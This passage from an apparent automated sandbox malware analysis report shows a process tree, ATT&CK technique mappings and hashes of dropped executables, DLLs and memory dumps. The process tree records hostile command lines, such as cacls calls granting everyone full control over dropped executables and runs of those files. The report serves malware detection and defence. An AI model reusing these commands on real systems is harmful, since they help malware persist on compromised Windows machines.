                                                                                                                                              PID:3488
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2472
                                                                                                                                                • C:\Windows\system32\cacls.exe
                                                                                                                                                  cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5104
                                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iylstni.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2040
                                                                                                                                                    • C:\Windows\ime\iylstni.exe
                                                                                                                                                      C:\Windows\ime\iylstni.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:928
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1608
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3536
                                                                                                                                                        • C:\Windows\system32\cacls.exe
                                                                                                                                                          cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2300
                                                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5628
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:6592
                                                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                                                cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6588
                                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iylstni.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4784
                                                                                                                                                                  • C:\Windows\ime\iylstni.exe
                                                                                                                                                                    C:\Windows\ime\iylstni.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:6496
                                                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5740
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:6584
                                                                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                                                                        cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3132

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                      Execution

                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Persistence

                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                      1
                                                                                                                                                                      T1543

                                                                                                                                                                      Windows Service

                                                                                                                                                                      1
                                                                                                                                                                      T1543.003

                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                      1
                                                                                                                                                                      T1547

                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                      1
                                                                                                                                                                      T1547.001

                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                      1
                                                                                                                                                                      T1543

                                                                                                                                                                      Windows Service

                                                                                                                                                                      1
                                                                                                                                                                      T1543.003

                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                      1
                                                                                                                                                                      T1547

                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                      1
                                                                                                                                                                      T1547.001

                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Defense Evasion

                                                                                                                                                                      Impair Defenses

                                                                                                                                                                      1
                                                                                                                                                                      T1562

                                                                                                                                                                      Disable or Modify System Firewall

                                                                                                                                                                      1
                                                                                                                                                                      T1562.004

                                                                                                                                                                      Modify Registry

                                                                                                                                                                      1
                                                                                                                                                                      T1112

                                                                                                                                                                      Discovery

                                                                                                                                                                      Network Service Discovery

                                                                                                                                                                      2
                                                                                                                                                                      T1046

                                                                                                                                                                      Query Registry

                                                                                                                                                                      1
                                                                                                                                                                      T1012

                                                                                                                                                                      System Information Discovery

                                                                                                                                                                      1
                                                                                                                                                                      T1082

                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                      1
                                                                                                                                                                      T1018

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Windows\SysWOW64\Packet.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        95KB

                                                                                                                                                                        MD5

                                                                                                                                                                        86316be34481c1ed5b792169312673fd

                                                                                                                                                                        SHA1

                                                                                                                                                                        6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                                                                        SHA256

                                                                                                                                                                        49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                                                                        SHA512

                                                                                                                                                                        3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                                                                      • C:\Windows\SysWOW64\wpcap.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        275KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4633b298d57014627831ccac89a2c50b

                                                                                                                                                                        SHA1

                                                                                                                                                                        e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                                                                        SHA256

                                                                                                                                                                        b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                                                                        SHA512

                                                                                                                                                                        29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                                                                      • C:\Windows\TEMP\bestbnuee\config.json
                                                                                                                                                                        Filesize

                                                                                                                                                                        693B

                                                                                                                                                                        MD5

                                                                                                                                                                        f2d396833af4aea7b9afde89593ca56e

                                                                                                                                                                        SHA1

                                                                                                                                                                        08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                                                                        SHA256

                                                                                                                                                                        d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                                                                        SHA512

                                                                                                                                                                        2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\2064.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4.1MB

                                                                                                                                                                        MD5

                                                                                                                                                                        4292a89393cad592a28a1461b189f4e8

                                                                                                                                                                        SHA1

                                                                                                                                                                        edaf00fb8a7e1e8bbbfbb1caea7436dad398b476

                                                                                                                                                                        SHA256

                                                                                                                                                                        a77d25897fa219d1fd7ad2b54cf2d106baea87931d25503b51baf26e1f14134c

                                                                                                                                                                        SHA512

                                                                                                                                                                        59484c867fa57a526d3bb1f268cc4bcb04304293cb67174acd19c983f02b4a6739d0235f168120942b2e7bba6f1c0686b4ef04906f0de7f7f4c8d3f553456282

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\2072.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        26.5MB

                                                                                                                                                                        MD5

                                                                                                                                                                        5d484b4e4a7f518b2be9d6c40ebcf104

                                                                                                                                                                        SHA1

                                                                                                                                                                        8be7c83e0861558afa73b9831e9668c7dde59a5a

                                                                                                                                                                        SHA256

                                                                                                                                                                        4be0718865884ae09efd4dcce128913993870e59c5a9d7abe5906c52ae1b6722

                                                                                                                                                                        SHA512

                                                                                                                                                                        264bdc96c85837298ed291d5231be3f686852b85c49430b3ed88563ab682b1080813a3d3820b1ae6409b87328688a7e8a01e317c6286cad2facf038b46c9d985

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\2416.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        3.5MB

                                                                                                                                                                        MD5

                                                                                                                                                                        9914dae6f788338e4b00106638a982c8

                                                                                                                                                                        SHA1

                                                                                                                                                                        f204f40f60d5c058867c88b7a76ff5d833e324c6

                                                                                                                                                                        SHA256

                                                                                                                                                                        c921db633efa793442c09daaf99fccd5e38dbb75ab5f8af9947feea32e0120d5

                                                                                                                                                                        SHA512

                                                                                                                                                                        6cff2a20e8333b0162f0c1f9929de778530f171022016b0a911763fd0fd400af00ede6a961ccf2e7b0705468dbe6aaac0f1644d0d6520c5d05ad8425539acc90

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\2520.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        2.9MB

                                                                                                                                                                        MD5

                                                                                                                                                                        dbc31de3e6c6e38599356e26b2903f34

                                                                                                                                                                        SHA1

                                                                                                                                                                        c2add1fa71c2198e4b42e35a5fae88e4f6795943

                                                                                                                                                                        SHA256

                                                                                                                                                                        21242c77e864da636b773765578b9769ed833e444037586c1271e3af061e13b6

                                                                                                                                                                        SHA512

                                                                                                                                                                        323a13747ae5e998f28dcc55f9b6b75e5c25ccc99b3d4ea6ea010107976476234661318412795ecdc772d1922ef3d551b7fcc9f9d7bb5c70091bcaf331c370d1

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\2708.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        7.6MB

                                                                                                                                                                        MD5

                                                                                                                                                                        392159e38edc4986e30d406dbf500d3d

                                                                                                                                                                        SHA1

                                                                                                                                                                        e85b7916239ee3bc5f49beb8f408bea3d3c54574

                                                                                                                                                                        SHA256

                                                                                                                                                                        0cc6a167ccaee2cf6748f1056f4213e1f89b8bc68422ac3774850467c6a88643

                                                                                                                                                                        SHA512

                                                                                                                                                                        92fc0c584f0ba4b1941d5054c0b512177e5eb51983c75f539f56238f9e4df0fa30e3d78c06b726a1793ed99871559a38a048cc9fde469bae305d028905f02cf3

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\3732.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        2.1MB

                                                                                                                                                                        MD5

                                                                                                                                                                        2672665a49d3c68cdefc4655ea463f1b

                                                                                                                                                                        SHA1

                                                                                                                                                                        fc705b4d75250a416314da31425d55f4d0974b20

                                                                                                                                                                        SHA256

                                                                                                                                                                        3bb31f047292f5c55f43e5cd8086e2e503d10da2d31506c19b900e62f38cf1eb

                                                                                                                                                                        SHA512

                                                                                                                                                                        d5aaef2237b24adc649b795265a800edfe2b9e685f2f74221fc4bf774991f90f5b6141694974dd2f062479c8e90f447128429a25b0e793d37ccf0a180ecc3cc7

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\3880.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        20.7MB

                                                                                                                                                                        MD5

                                                                                                                                                                        28ef64a7dcdafafc4dde8000ff95cc7d

                                                                                                                                                                        SHA1

                                                                                                                                                                        95414cc494ce56b5d32d9ca727d897e95bdeb979

                                                                                                                                                                        SHA256

                                                                                                                                                                        896e68cbb88cbdff78c67751316fc8c6ccafb2030c9e44c24c91b8ad98a59136

                                                                                                                                                                        SHA512

                                                                                                                                                                        d24ea876742e01dfdf68241bcd3664bdae8c8f918676a80a07919237643408f6cdba41797b3475086c8350770b627b3c4537f8f41b93e4c13ca021f7027d1dbf

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\392.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        33.6MB

                                                                                                                                                                        MD5

                                                                                                                                                                        03fcbc83e963e7ee3f47d447d1d65697

                                                                                                                                                                        SHA1

                                                                                                                                                                        b77fd6f065e65d341c4bb0a5b25866c0f46e15e3

                                                                                                                                                                        SHA256

                                                                                                                                                                        0f0ca4a2b88f26e277b6372a2a2d55e499134bcc16ced5fb760fd4eb5615cacf

                                                                                                                                                                        SHA512

                                                                                                                                                                        0ef5650ddac2b7fc34d788c2fc5274c445fe19b562f1c1d9c2d74dea65b49269eaf9cb1b3f864c9186fb8af685495164177036e947ca933d4a24169f385d4b4a

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\3944.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4.3MB

                                                                                                                                                                        MD5

                                                                                                                                                                        ed197c9ef3f1e38ef1e6b994192a1a9f

                                                                                                                                                                        SHA1

                                                                                                                                                                        7e8272eb394db13a1310cae2a1aa8b8811bb8fe2

                                                                                                                                                                        SHA256

                                                                                                                                                                        c74f3c171d5e84c8b9e01ea1e2fc7db9e0eff776e3923fa0bb0fc9b7585f68a2

                                                                                                                                                                        SHA512

                                                                                                                                                                        0d36e53c1a19722c5e5b735862690cf496c9e45d77f8cf1e15084c29e2f246b99c0619f6344e2b5a3849daddfdd0b5e2b4594d117f823b6d49b1f6386fb2ab01

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\4028.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        43.9MB

                                                                                                                                                                        MD5

                                                                                                                                                                        b4a6fad4e5224f7847b548a20a4cb311

                                                                                                                                                                        SHA1

                                                                                                                                                                        e00fd555e387e3534585f5caf2b44d313ca3497e

                                                                                                                                                                        SHA256

                                                                                                                                                                        575e40813c429b2824ffa17541b296f04496c4f2a074b608e9c0c0c800e5a785

                                                                                                                                                                        SHA512

                                                                                                                                                                        0ef4d4ffe886d34f7cf6f4a1ef34e3c76a592c76edd75a35fe9331615d8ac345c6dfc34434bc1a8f5ae60ba54dd0d7e1035547fc7a6ccf2e46e0cfa976110902

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\4764.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.2MB

                                                                                                                                                                        MD5

                                                                                                                                                                        60feeee6fbbec2d38b3875064d21ed0a

                                                                                                                                                                        SHA1

                                                                                                                                                                        151d9f45be00bf94d08cb9418d268c10ab8f54ad

                                                                                                                                                                        SHA256

                                                                                                                                                                        5ce7f3754d683db019313b170193fc266b07193938a3f5a7f9edf8bf078e6460

                                                                                                                                                                        SHA512

                                                                                                                                                                        2b9f064b80477d560367d6d7bbd9d8244f203caf40f4796351c93b535f3e48722e88671820a3cc5e606566540af509bbd35eb73aa819b871e77d82aacdcdb8c3

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\544.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        8.6MB

                                                                                                                                                                        MD5

                                                                                                                                                                        211f37f2d53b6e94e6016196c82a09d0

                                                                                                                                                                        SHA1

                                                                                                                                                                        8d980e2ac57ee0c1389a731c65e21996974acba5

                                                                                                                                                                        SHA256

                                                                                                                                                                        d6903dcab9a68c3123a2edded95c69f1ce7d7cf970491c8c9a67c55ecdf98f9b

                                                                                                                                                                        SHA512

                                                                                                                                                                        4d27f5325a8e7818c3463a2e55c2528dea8e3ed0debe82db07f6217e751cd5697b9b01b623f4b02c2427cd2d399741c0f958e65d8fb2ad5772094a9ada65faf5

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\704.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        810KB

                                                                                                                                                                        MD5

                                                                                                                                                                        aa7b8b694c9a7a757509845a624a40dc

                                                                                                                                                                        SHA1

                                                                                                                                                                        aee8c5d7c96b95f207425913e61ff2a551f55e30

                                                                                                                                                                        SHA256

                                                                                                                                                                        618cf705e2b6a5320294495bb8df513699e1d241be7644d94614c178a9a9358e

                                                                                                                                                                        SHA512

                                                                                                                                                                        8942f4a2720d9d32493162cbc49c601cc9524c15832c463654920820810b719ffe2ca4742dc767abb1267b8700c49e9bedd887011d06a55896b19c9dacc94324

                                                                                                                                                                      • C:\Windows\TEMP\nbuyiybyv\796.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        2.0MB

                                                                                                                                                                        MD5

                                                                                                                                                                        99bb1843e93dff42fab56bc49b232df6

                                                                                                                                                                        SHA1

                                                                                                                                                                        dc187440e86feafc3712244c45a7a4a57ae92a48

                                                                                                                                                                        SHA256

                                                                                                                                                                        cec6223c7bf57ed3b74234186df2b48ca83589dafe7c545a3116478f8747931b

                                                                                                                                                                        SHA512

                                                                                                                                                                        6a8512e33c15507b9270a433f034ec4bcbbfadb8eef670cc6d310baefbaaae377e0366e71846034640db133d6a69c7990318b75e90e05c1b157b9741333c0ab1

                                                                                                                                                                      • C:\Windows\TEMP\xohudmc.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                        MD5

                                                                                                                                                                        cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                                                                        SHA1

                                                                                                                                                                        73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                                                                        SHA256

                                                                                                                                                                        7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                                                                        SHA512

                                                                                                                                                                        b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                                                                      • C:\Windows\Temp\bestbnuee\lslnam.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        343KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2b4ac7b362261cb3f6f9583751708064

                                                                                                                                                                        SHA1

                                                                                                                                                                        b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                                                                        SHA256

                                                                                                                                                                        a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                                                                        SHA512

                                                                                                                                                                        c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                                                                      • C:\Windows\Temp\nbuyiybyv\entlmlitm.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        126KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e8d45731654929413d79b3818d6a5011

                                                                                                                                                                        SHA1

                                                                                                                                                                        23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                                                                        SHA256

                                                                                                                                                                        a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                                                                        SHA512

                                                                                                                                                                        df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                                                                      • C:\Windows\Temp\nsz6A11.tmp\System.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        11KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                                                                        SHA1

                                                                                                                                                                        98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                                                                        SHA512

                                                                                                                                                                        2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                                                                      • C:\Windows\Temp\nsz6A11.tmp\nsExec.dll
                                                                                                                                                                        Filesize

                                                                                                                                                                        6KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b648c78981c02c434d6a04d4422a6198

                                                                                                                                                                        SHA1

                                                                                                                                                                        74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                                                                        SHA256

                                                                                                                                                                        3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                                                                        SHA512

                                                                                                                                                                        219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                                                                      • C:\Windows\nbuyiybyv\Corporate\vfshost.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        381KB

                                                                                                                                                                        MD5

                                                                                                                                                                        fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                                                                        SHA1

                                                                                                                                                                        51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                                                                        SHA256

                                                                                                                                                                        441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                                                                                        SHA512

                                                                                                                                                                        74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                                                                      • C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        332KB

                                                                                                                                                                        MD5

                                                                                                                                                                        ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                                                                        SHA1

                                                                                                                                                                        fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                                                                        SHA256

                                                                                                                                                                        4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                                                                        SHA512

                                                                                                                                                                        7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                                                                      • C:\Windows\nbuyiybyv\smnabayei\wpcap.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        424KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e9c001647c67e12666f27f9984778ad6

                                                                                                                                                                        SHA1

                                                                                                                                                                        51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                                                                        SHA256

                                                                                                                                                                        7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                                                                        SHA512

                                                                                                                                                                        56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                                                                      • C:\Windows\nlmttyea\iylstni.exe
                                                                                                                                                                        Filesize

                                                                                                                                                                        8.9MB

                                                                                                                                                                        MD5

                                                                                                                                                                        e45a6a6e386b89f55bbcd307a728a1bb

                                                                                                                                                                        SHA1

                                                                                                                                                                        4edb479296488b1c4cbcd0a389a0e52d21a9707a

                                                                                                                                                                        SHA256

                                                                                                                                                                        d810dee18c0cb1157fcfc24666feb8ebacc7f02954db12b6dec87cf4a6e89de6

                                                                                                                                                                        SHA512

                                                                                                                                                                        53d1287af3ceb8b37f411d500379ce91e095c23ac034ff3932a189b557674a6a00cd66c5bb93b97d19231195aee9d363bca9db302a11f7921d53cce5123524ac

                                                                                                                                                                      • C:\Windows\system32\drivers\etc\hosts
                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c838e174298c403c2bbdf3cb4bdbb597

                                                                                                                                                                        SHA1

                                                                                                                                                                        70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                                                                                                                        SHA256

                                                                                                                                                                        1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                                                                                                                        SHA512

                                                                                                                                                                        c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                                                                                                                      • memory/316-77-0x0000000001110000-0x000000000115C000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        304KB

                                                                                                                                                                      • memory/844-202-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/1124-189-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/1144-159-0x0000000010000000-0x0000000010008000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/1384-194-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/2312-175-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/2804-211-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/2832-136-0x00007FF68E190000-0x00007FF68E27E000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        952KB

                                                                                                                                                                      • memory/2832-134-0x00007FF68E190000-0x00007FF68E27E000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        952KB

                                                                                                                                                                      • memory/2952-225-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3016-0-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        6.6MB

                                                                                                                                                                      • memory/3132-7-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        6.6MB

                                                                                                                                                                      • memory/3140-179-0x0000020683950000-0x0000020683954000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/3140-154-0x0000020683960000-0x0000020683964000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/3140-256-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-255-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-178-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-172-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-204-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-252-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-230-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-244-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-152-0x0000020683950000-0x0000020683954000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/3140-214-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-147-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-151-0x0000020683940000-0x0000020683944000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/3140-218-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-191-0x00007FF6A7D10000-0x00007FF6A7E30000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/3140-150-0x0000020683930000-0x0000020683940000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/3404-246-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/3536-216-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4124-170-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        364KB

                                                                                                                                                                      • memory/4312-221-0x00007FF615B20000-0x00007FF615B7B000-memory.dmp
                                                                                                                                                                        Filesize

